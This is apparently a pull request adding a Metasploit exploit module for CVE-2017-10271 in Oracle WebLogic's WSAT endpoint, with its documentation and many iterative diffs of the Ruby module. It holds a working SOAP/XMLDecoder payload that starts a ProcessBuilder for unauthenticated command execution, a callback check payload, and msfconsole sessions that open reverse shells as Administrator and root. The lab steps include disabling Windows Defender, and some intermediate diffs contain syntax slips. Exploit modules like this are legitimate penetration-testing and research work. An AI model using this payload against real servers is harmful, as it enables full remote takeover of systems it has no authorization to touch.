### PR TITLE
Add CVE-2017-10271 / Oracle WebLogic wls-wsat RCE exploit

### DIFF
--- a/documentation/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce.md
+++ b/documentation/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce.md
@@ -1,0 +1,95 @@
+# Description
+
+This module works leverages [CVE-2017-10271](https://nvd.nist.gov/vuln/detail/CVE-2017-10271) against Oracle WebLogic Server's  Web Service Atomic Transaction API a XML SOAP request to create a `java.lang.ProcessBuilder` object to provide unauthenticated arbitrary command execution.  A command line can be acquired through the use of `cmd/unix/reverse_python`.
+
+Note that the TARGET must be set to match either a Windows or Unix-based host.  If the TARGET variable is set improperly, a log entry will be generated on a vulnerable server, but the server will not crash.  For example, a Linux payload sent to a Windows server will output:
+
+```
+java.io.IOException: Cannot run program "/bin/sh": CreateProcess error=2, The system cannot find the file specified
+Continuing ...
+```
+
+# Vulnerable Application
+
+Oracle WebLogic server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 with access to Web Services Atomic Transaction (WS-AT) endpoints are vulnerable to unauthenticated arbitrary command execution.
+
+### Windows: Setting up a vulnerable application
+
+We successfully tested this exploit against a fully-patched, Windows 10 (x64) target.  Since WebLogic is resource intensive, consider providing four cores and 8GB of RAM.
+
+1. [Download](http://www.oracle.com/technetwork/middleware/weblogic/downloads/wls-main-097127.html) Oracle WebLogic Server 10.3.6, using the "Windows x86 with 32-bit JVM" (`wls1036_win32.exe`).
+2. Run the installer.  (See [here] for detailed instructions.)  You may be prompted to install a Java Development Kit (JDK).  [JDK 8u151 x64](http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html) was verified working.
+3. Windows Defender will block the payload from executing, so you may need to [temporarily](https://support.microsoft.com/en-us/help/4027187/windows-turn-off-windows-defender-antivirus) or [permanently](https://www.windowscentral.com/how-permanently-disable-windows-defender-windows-10) disable it.
+4. Run the configuration wizard and [create a new weblogic domain](https://docs.oracle.com/cd/E29542_01/web.1111/e14140/newdom.htm#WLDCW192).  Domain names and credentials are irrelevant.  At the conclusion of the wizard, click "Start Admin Server".
+5. The `startWebLogic.cmd` should run immediately after the installer and present logging output.  Once running, the window should output a line similar to the following
+```
+<Jan 11, 2018 1:30:49 PM CST> <Notice> <WebLogicServer> <BEA-000365> <Server state changed to RUNNING>
+<Jan 11, 2018 1:30:49 PM CST> <Notice> <WebLogicServer> <BEA-000360> <Server started in RUNNING mode>
+```
+
+### Windows: Attacking a vulnerable application
+
+Attack the above Windows server using the `exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`:
+
+```
+msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of your target]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 0
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/windows/reverse_powershell
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of your attacker]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run
+
+[*] Started reverse TCP handler on 192.168.108.1:4444
+[*] Command shell session 1 opened (192.168.108.1:4444 -> 192.168.108.132:50060) at 2018-01-11 11:48:16 -0600
+
+Microsoft Windows [Version 10.0.16299.192]
+(c) 2017 Microsoft Corporation. All rights reserved.
+
+C:\Oracle\Middleware\user_projects\domains\admindomain>whoami
+weblogic-server\Administrator
+```
+
+### Unix: Setting up a vulnerable environment
+
+1. If necessary, install Docker.io.  [These instructions](https://www.ptrace-security.com/2017/06/14/how-to-install-docker-on-kali-linux-2017-1/) were tested on a Kali 2017.3 VM:
+
+```
+apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
+echo 'deb https://apt.dockerproject.org/repo debian-stretch main' > /etc/apt/sources.list.d/docker.list
+apt update
+apt-get install docker-engine
+service docker start
+docker run hello-world
+```
+
+2. Install a container running Ubuntu 16.04 and WebLogic 10.3.6.0:
+```
+docker run -d -p7001:7001 -p80:7001 kkirsche/cve-2017-10271
+```
+
+3. Confirm that the container is up.
+```
+docker ps
+```
+
+### Unix: Attacking a vulnerable application
+
+Attack the above Unix server using the `exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`:
+
+```
+msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of the target]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 1
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/unix/reverse_python
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of the attacker]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run
+
+[*] Started reverse TCP handler on 192.168.108.1:4444
+[*] Command shell session 5 opened (192.168.108.1:4444 -> 192.168.108.129:51312) at 2018-01-11 11:46:49 -0600
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+# Credits
+Documentation originally written by Aaron Soto (@asoto-r7) and was edited by Kevin Kirsche (@kkirsche).

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -111,13 +111,12 @@ class MetasploitModule < Msf::Exploit::Remote
   # from the target machine.
   #
   def check_process_builder_payload
-    return_request_url = "http://#{lookup_actual_host}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
     xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
   <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
       <java version="1.8" class="java.beans.XMLDecoder">
         <object id="url" class="java.net.URL">
-          <string>#{return_request_url.encode(xml: :text)}</string>
+          <string>#{get_uri.encode(xml: :text)}</string>
         </object>
         <object idref="url">
           <void id="stream" method = "openStream" />
@@ -138,19 +137,6 @@ class MetasploitModule < Msf::Exploit::Remote
     send_response(cli, random_content)
 
     @received_request = true
-  end
-
-  #
-  # Identifies our public IP address so that we can make sure to include it instead of 0.0.0.0
-  # in our payload.
-  #
-  def lookup_actual_host()
-    # Get the source address
-    if datastore['SRVHOST'] == '0.0.0.0'
-      Rex::Socket.source_address('50.50.50.50')
-    else
-      datastore['SRVHOST']
-    end
   end
 
   #

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -50,25 +50,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
-      OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
-      OptInt.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20])
+      Opt::RPORT(7001, true, 'The remote port that the WebLogic WSAT endpoint listens on')
+      OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20])
     ])
   end
 
   def cmd_base
-    if target_platform == 'win'
-      return 'cmd'
-    else
-      return '/bin/sh'
-    end
+    target_platform == 'win' ? 'cmd' : '/bin/sh'
   end
 
   def cmd_opt
-    if target_platform == 'win'
-      return '/c'
-    else
-      return '-c'
-    end
+    target_platform == 'win' ? '/c' : '-c'
   end
 
   def process_builder_payload
@@ -124,12 +116,10 @@ class MetasploitModule < Msf::Exploit::Remote
   # followed by the fake return address and then the payload.
   #
   def exploit
-    xml_payload = process_builder_payload
-
     send_request_cgi({
       'method'   => 'POST',
       'uri'      => normalize_uri(target_uri.path),
-      'data'     => xml_payload,
+      'data'     => process_builder_payload,
       'ctype'    => 'text/xml;charset=UTF-8'
     }, datastore['TIMEOUT'])
   end

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -16,13 +16,20 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description'    => %q(
             The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
         remote code execution vulnerability. Supported versions that are affected are
-        10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
+        10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
+        of ERPScan and Federico Dotta of Media Service.
         ),
         'License'        => MSF_LICENSE,
-        'Author'         => ['d3c3pt10n <d3c3pt10n[AT]deceiveyour.team>'],
+        'Author'         => [
+          'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module
+          'Luffin', # Proof of Concept
+          'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery
+        ],
         'References'     =>
           [
-            [ 'URL', 'http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html'],
+            [ 'URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'],
+            [ 'POC', 'https://github.com/Luffin/CVE-2017-10271'],
+            [ 'Standalone Exploit', 'https://github.com/kkirsche/CVE-2017-10271'],
             [ 'CVE', '2017-10271']
           ],
         'Platform'      => %w{ win linux unix },
@@ -30,13 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets'        =>
           [
             [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
-            [ 'Unix Command payload', { 'Arch' => [ARCH_CMD], Platform => 'unix' } ],
-            [ 'Linux Command payload', { 'Arch' => [ARCH_CMD], Platform => 'linux' } ]
+            [ 'Unix Command payload', { 'Arch' => ARCH_CMD, Platform => 'unix' } ],
           ],
-        'Payload'        =>
-        {
-          'DisableNops' => true
-        },
         'DisclosureDate' => "Oct 19 2017",
         # Note that this is by index, rather than name. It's generally easiest
         # just to put the default at the beginning of the list and skip this
@@ -47,24 +49,27 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
-      OptInt.new('TIMEOUT', [true, "The timeout in seconds", 10]),
       OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
     ])
   end
 
-  def cmd_payload
-    # Do NOT move the ampersand to a non-first index spot or else it'll replace aspects that we need
-    # This escaping makes sure that our payload works!
-    replacements = [ ['&', '&amp;'], ['"', '&quot;'], ["'", '&apos;'], ['<', '&lt;'], ['>', '&gt;'] ]
-    xml_prepared = payload.encoded
-    replacements.each do |r|
-      xml_prepared.gsub!(r[0], r[1])
+  def cmd_base
+    if target_platform == 'win'
+      return 'cmd'
+    else
+      return '/bin/sh'
     end
-
-    return xml_prepared
   end
 
-  def unix_payload
+  def cmd_opt
+    if target_platform == 'win'
+      return '/c'
+    else
+      return '-c'
+    end
+  end
+
+  def process_builder_payload
     # Generate a payload which will execute on a *nix machine using /bin/sh
     xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
   <soapenv:Header>
@@ -73,40 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote
         <object class="java.lang.ProcessBuilder">
           <array class="java.lang.String" length="3" >
             <void index="0">
-              <string>/bin/sh</string>
+              <string>#{cmd_base}</string>
             </void>
             <void index="1">
-              <string>-c</string>
+              <string>#{cmd_opt}</string>
             </void>
             <void index="2">
-              <string>#{cmd_payload}</string>
-            </void>
-          </array>
-          <void method="start"/>
-        </object>
-      </java>
-    </work:WorkContext>
-  </soapenv:Header>
-  <soapenv:Body/>
-</soapenv:Envelope>}
-  end
-
-  # Generate a payload which will execute on a Windows machine using cmd
-  def windows_payload
-    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
-  <soapenv:Header>
-    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
-      <java>
-        <object class="java.lang.ProcessBuilder">
-          <array class="java.lang.String" length="3" >
-            <void index="0">
-              <string>cmd</string>
-            </void>
-            <void index="1">
-              <string>/c</string>
-            </void>
-            <void index="2">
-              <string>#{cmd_payload}</string>
+              <string>#{payload.encoded.encode(xml: :text)}</string>
             </void>
           </array>
           <void method="start"/>
@@ -119,13 +97,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
 # Not sure how to catch the response, so I'll leave this here in case someone can help
-#   def check_payload
+# This payload is used by sending to the RHOST and then you will receive an HTTP request
+# back from the target. If you got a request, it's vulnerable. If you didn't, it's not.
+#   def http_check_payload
 #     xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
 #   <soapenv:Header>
 #     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
 #       <java version="1.8" class="java.beans.XMLDecoder">
 #         <object id="url" class="java.net.URL">
-#           <string>http://{lhost}:{lport}/{random_uri}</string>
+#           <string>http://#{datastore['LHOST']}:#{datastore['LPORT']}/#{random_uri}</string>
 #         </object>
 #         <object idref="url">
 #           <void id="stream" method = "openStream" />
@@ -142,14 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # followed by the fake return address and then the payload.
   #
   def exploit
-    target_os = datastore['TARGET'].to_i
-
-    xml_payload = ''
-    if target_os == 0
-      xml_payload = windows_payload
-    else
-      xml_payload = unix_payload
-    end
+    xml_payload = process_builder_payload
 
     send_request_cgi(
       'method'   => 'POST',

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -4,9 +4,10 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
     super(
@@ -17,7 +18,9 @@ class MetasploitModule < Msf::Exploit::Remote
             The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
         remote code execution vulnerability. Supported versions that are affected are
         10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
-        of ERPScan and Federico Dotta of Media Service.
+        of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,
+        HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check
+        and will not be used when executing the exploit itself.
         ),
         'License'        => MSF_LICENSE,
         'Author'         => [
@@ -50,20 +53,33 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
-      Opt::RPORT(7001, true, 'The remote port that the WebLogic WSAT endpoint listens on'),
-      OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0])
+      OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
+      OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]),
+      OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 30])
     ])
   end
 
   def cmd_base
-    target['Platform'] == 'win' ? 'cmd' : '/bin/sh'
+    if target['Platform'] == 'win'
+      return 'cmd'
+    else
+      return '/bin/sh'
+    end
   end
 
   def cmd_opt
-    target['Platform'] == 'win' ? '/c' : '-c'
+    if target['Platform'] == 'win'
+      return '/c'
+    else
+      return '-c'
+    end
   end
 
-  def process_builder_payload
+
+  #
+  # This generates a XML payload that will execute the desired payload on the RHOST
+  #
+  def exploit_process_builder_payload
     # Generate a payload which will execute on a *nix machine using /bin/sh
     xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
   <soapenv:Header>
@@ -90,36 +106,100 @@ class MetasploitModule < Msf::Exploit::Remote
 </soapenv:Envelope>}
   end
 
-# Not sure how to catch the response, so I'll leave this here in case someone can help
-# This payload is used by sending to the RHOST and then you will receive an HTTP request
-# back from the target. If you got a request, it's vulnerable. If you didn't, it's not.
-#   def http_check_payload
-#     xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
-#   <soapenv:Header>
-#     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
-#       <java version="1.8" class="java.beans.XMLDecoder">
-#         <object id="url" class="java.net.URL">
-#           <string>http://#{datastore['LHOST']}:#{datastore['LPORT']}/#{random_uri}</string>
-#         </object>
-#         <object idref="url">
-#           <void id="stream" method = "openStream" />
-#         </object>
-#       </java>
-#     </work:WorkContext>
-#     </soapenv:Header>
-#   <soapenv:Body/>
-# </soapenv:Envelope>}
-#   end
+  #
+  # This builds a XML payload that will generate a HTTP GET request to our SRVHOST
+  # from the target machine.
+  #
+  def check_process_builder_payload
+    return_request_url = "http://#{lookup_actual_host}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
+    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java version="1.8" class="java.beans.XMLDecoder">
+        <object id="url" class="java.net.URL">
+          <string>#{return_request_url.encode(xml: :text)}</string>
+        </object>
+        <object idref="url">
+          <void id="stream" method = "openStream" />
+        </object>
+      </java>
+    </work:WorkContext>
+    </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
 
   #
-  # The exploit method connects to the remote service and sends 1024 random bytes
-  # followed by the fake return address and then the payload.
+  # In the event that a 'check' host responds, we should respond randomly so that we don't clog up
+  # the logs too much with a no response error or similar.
+  #
+  def on_request_uri(cli, request)
+    random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'
+    send_response(cli, random_content)
+
+    @received_request = true
+  end
+
+  #
+  # Identifies our public IP address so that we can make sure to include it instead of 0.0.0.0
+  # in our payload.
+  #
+  def lookup_actual_host()
+    # Get the source address
+    if datastore['SRVHOST'] == '0.0.0.0'
+      Rex::Socket.source_address('50.50.50.50')
+    else
+      datastore['SRVHOST']
+    end
+  end
+
+  #
+  # The exploit method connects to the remote service and sends a randomly generated string
+  # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive
+  # the response from. This is based off of the exploit technique from
+  # exploits/windows/novell/netiq_pum_eval.rb
+  #
+  def check
+    datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
+
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => datastore['URIPATH']
+    }})
+
+    print_status('Sending the check payload...')
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path),
+      'data'     => check_process_builder_payload,
+      'ctype'    => 'text/xml;charset=UTF-8'
+    }, datastore['TIMEOUT'])
+
+    print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...")
+
+    waited = 0
+    while (not @received_request)
+      select(nil, nil, nil, 1)
+        waited += 1
+      if (waited > datastore['HTTP_DELAY'])
+        return Exploit::CheckCode::Safe
+      end
+    end
+
+    return Exploit::CheckCode::Vulnerable
+  end
+
+  #
+  # The exploit method connects to the remote service and sends the specified payload
+  # encapsulated within a SOAP XML body.
   #
   def exploit
     send_request_cgi({
       'method'   => 'POST',
       'uri'      => normalize_uri(target_uri.path),
-      'data'     => process_builder_payload,
+      'data'     => exploit_process_builder_payload,
       'ctype'    => 'text/xml;charset=UTF-8'
     }, datastore['TIMEOUT'])
   end

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -27,10 +27,11 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References'     =>
           [
-            [ 'URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'],
-            [ 'POC', 'https://github.com/Luffin/CVE-2017-10271'],
-            [ 'Standalone Exploit', 'https://github.com/kkirsche/CVE-2017-10271'],
-            [ 'CVE', '2017-10271']
+            ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'],
+            ['POC', 'https://github.com/Luffin/CVE-2017-10271'],
+            ['Standalone Exploit', 'https://github.com/kkirsche/CVE-2017-10271'],
+            ['CVE', '2017-10271'],
+            ['EDB', '43458']
           ],
         'Platform'      => %w{ win unix },
         'Arch'          => [ ARCH_CMD ],

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
-      Opt::RPORT(7001, true, 'The remote port that the WebLogic WSAT endpoint listens on')
+      Opt::RPORT(7001, true, 'The remote port that the WebLogic WSAT endpoint listens on'),
       OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0])
     ])
   end

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -146,15 +146,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # exploits/windows/novell/netiq_pum_eval.rb
   #
   def check
-    datastore['URIPATH'] = datastore['URIPATH'] || random_uri
-    datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
-
-    start_service({'Uri' => {
-      'Proc' => Proc.new { |cli, req|
-        on_request_uri(cli, req)
-      },
-      'Path' => datastore['URIPATH']
-    }})
+    start_service
 
     print_status('Sending the check payload...')
     res = send_request_cgi({
@@ -167,7 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...")
 
     waited = 0
-    while (not @received_request)
+    until @received_request
       sleep 1
       waited += 1
       if (waited > datastore['HTTP_DELAY'])

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -50,6 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
       OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
+      OptInt.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20])
     ])
   end
 
@@ -124,11 +125,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     xml_payload = process_builder_payload
 
-    send_request_cgi(
+    send_request_cgi({
       'method'   => 'POST',
       'uri'      => normalize_uri(target_uri.path),
       'data'     => xml_payload,
       'ctype'    => 'text/xml;charset=UTF-8'
-    )
+    }, datastore['TIMEOUT'])
   end
 end

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -7,7 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::HttpServer
+  # include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
     super(
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
       OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
       OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]),
-      OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])
+      # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])
     ])
   end
 
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
   <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
       <java>
-        <object class="java.lang.ProcessBuilder">
+        <void class="java.lang.ProcessBuilder">
           <array class="java.lang.String" length="3" >
             <void index="0">
               <string>#{cmd_base}</string>
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
             </void>
           </array>
           <void method="start"/>
-        </object>
+        </void>
       </java>
     </work:WorkContext>
   </soapenv:Header>
@@ -115,12 +115,12 @@ class MetasploitModule < Msf::Exploit::Remote
   <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
       <java version="1.8" class="java.beans.XMLDecoder">
-        <object id="url" class="java.net.URL">
+        <void id="url" class="java.net.URL">
           <string>#{get_uri.encode(xml: :text)}</string>
-        </object>
-        <object idref="url">
+        </void>
+        <void idref="url">
           <void id="stream" method = "openStream" />
-        </object>
+        </void>
       </java>
     </work:WorkContext>
     </soapenv:Header>
@@ -145,32 +145,35 @@ class MetasploitModule < Msf::Exploit::Remote
   # the response from. This is based off of the exploit technique from
   # exploits/windows/novell/netiq_pum_eval.rb
   #
-  def check
-    start_service
-
-    print_status('Sending the check payload...')
-    res = send_request_cgi({
-      'method'   => 'POST',
-      'uri'      => normalize_uri(target_uri.path),
-      'data'     => check_process_builder_payload,
-      'ctype'    => 'text/xml;charset=UTF-8'
-    }, datastore['TIMEOUT'])
-
-    print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...")
-
-    waited = 0
-    until @received_request
-      sleep 1
-      waited += 1
-      if waited > datastore['HTTP_DELAY']
-        stop_service
-        return Exploit::CheckCode::Safe
-      end
-    end
-
-    stop_service
-    return Exploit::CheckCode::Vulnerable
-  end
+  # This doesn't work as is because MSF cannot mix HttpServer and HttpClient
+  # at the time of authoring this
+  #
+  # def check
+  #   start_service
+  #
+  #   print_status('Sending the check payload...')
+  #   res = send_request_cgi({
+  #     'method'   => 'POST',
+  #     'uri'      => normalize_uri(target_uri.path),
+  #     'data'     => check_process_builder_payload,
+  #     'ctype'    => 'text/xml;charset=UTF-8'
+  #   }, datastore['TIMEOUT'])
+  #
+  #   print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...")
+  #
+  #   waited = 0
+  #   until @received_request
+  #     sleep 1
+  #     waited += 1
+  #     if waited > datastore['HTTP_DELAY']
+  #       stop_service
+  #       return Exploit::CheckCode::Safe
+  #     end
+  #   end
+  #
+  #   stop_service
+  #   return Exploit::CheckCode::Vulnerable
+  # end
 
   #
   # The exploit method connects to the remote service and sends the specified payload

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -160,6 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # exploits/windows/novell/netiq_pum_eval.rb
   #
   def check
+    datastore['URIPATH'] = datastore['URIPATH'] || random_uri
     datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
 
     start_service({'Uri' => {

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
             ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin
             ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept
             ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit
-            ['CVE', '2017-10271'], 
+            ['CVE', '2017-10271'],
             ['EDB', '43458']
           ],
         'Platform'      => %w{ win unix },

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -155,8 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method'   => 'POST',
       'uri'      => normalize_uri(target_uri.path),
       'data'     => xml_payload,
-      'ctype'    => 'text/xml;charset=UTF-8',
-      'headers'  => { 'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' }
+      'ctype'    => 'text/xml;charset=UTF-8'
     )
   end
 end

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -27,10 +27,10 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References'     =>
           [
-            ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'],
-            ['POC', 'https://github.com/Luffin/CVE-2017-10271'],
-            ['Standalone Exploit', 'https://github.com/kkirsche/CVE-2017-10271'],
-            ['CVE', '2017-10271'],
+            ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin
+            ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept
+            ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit
+            ['CVE', '2017-10271'], 
             ['EDB', '43458']
           ],
         'Platform'      => %w{ win unix },

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
